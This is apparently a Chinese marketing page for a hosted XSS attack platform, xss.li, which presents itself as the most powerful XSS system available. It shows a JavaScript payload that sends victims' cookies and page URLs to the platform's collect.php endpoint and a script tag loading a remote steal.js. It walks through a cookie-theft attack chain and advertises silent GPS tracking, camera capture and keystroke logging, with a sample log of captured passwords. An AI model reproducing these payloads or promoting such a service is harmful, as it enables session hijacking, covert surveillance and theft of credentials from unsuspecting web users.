蓝莲花XSS在线平台

全网功能最强大的XSS系统包含知识库Payload调试

Scroll Down
0
XSS请求提交
0
活跃用户
0
Payload(每周更新)
0
平台稳定性

核心功能演示

XSS攻击数据流转过程

攻击者 注入Payload XSS代码 目标网站 存储/执行 触发执行 受害者 浏览器执行 数据回传 XSS.li平台 实时接收数据 Cookie | 键盘 | GPS...

攻击者注入XSS代码 → 存储到目标网站 → 受害者触发执行 → 数据回传到XSS平台

📊 实时监控后台

0 XSS管理后台 📈 Dashboard 📋 Logs 📝 Templates 👥 Users 1,234 总日志数 56 今日日志 89 独立IP 12 在线用户 📈 实时流量趋势

实时统计面板:日志数、IP数、在线用户、流量趋势一目了然

💉 Payload注入示例

payload.js 1 2 3 4 5 6 7 8 <script> fetch ( 'https://xss.li/api/collect.php' ,{ method: 'POST' , body: JSON.stringify ({ cookie: document.cookie , url: location.href }) }); </script> ✓ 代码执行成功

JavaScript Payload示例:窃取Cookie并发送到服务器

🍪 Cookie窃取完整流程

步骤1 用户正常登录 获得session session_id=abc123 </> 步骤2 访问含XSS 的恶意页面 <script src= "xss.li/steal.js" ></script> document.cookie session_id=abc123 user_id=12345 token=xyz789 步骤3 JS窃取Cookie XSS平台服务器 POST /api/collect.php { "cookie": "abc123", "ip": "192.168.1.1", "time": "2024-01-01" }

完整攻击链:用户登录获得Session → 访问恶意页面 → JavaScript窃取Cookie → 数据发送到XSS平台

📍 GPS定位追踪

N E 📍 定位信息 经度: 116.404 纬度: 39.915 精度: ±50m ⏰ 2024-01-01 12:00 地标A 建筑

通过浏览器Geolocation API获取用户精确GPS坐标

📷 摄像头远程拍照

用户摄像头 REC 拍照 上传 ✓ 已获取权限

利用MediaDevices API静默拍照并上传到服务器

📋 实时数据回传日志

📊 XSS数据收集日志 - 实时监控 时间 IP地址 类型 数据内容 状态 12:34:56 192.168.1.100 🍪 Cookie session_id=abc123xyz... 成功 12:35:12 10.0.0.25 ⌨️ 键盘 keys: password123, admin... 成功 12:35:45 172.16.0.88 📍 GPS lat:39.915, lng:116.404 成功 12:36:20 192.168.2.50 📷 摄像头 image: base64_data... 处理中 ● 新日志 12:36:58 正在接收数据...

所有窃取的数据实时显示:Cookie、键盘记录、GPS定位、摄像头照片等一目了然

🚀 零配置部署

自动数据库初始化,内置所有依赖库,一键导入30+ Payload模板,支持Nginx/Apache

🔒 安全可靠

IP白名单/黑名单保护,用户权限隔离,SQL注入防护(PDO预处理),XSS输出过滤

📱 响应式设计

完美适配桌面/平板/手机,Bootstrap 5响应式栅格,移动端优化交互

准备好开始了吗?

想要获得更好的技术服务?请点击下方联系我们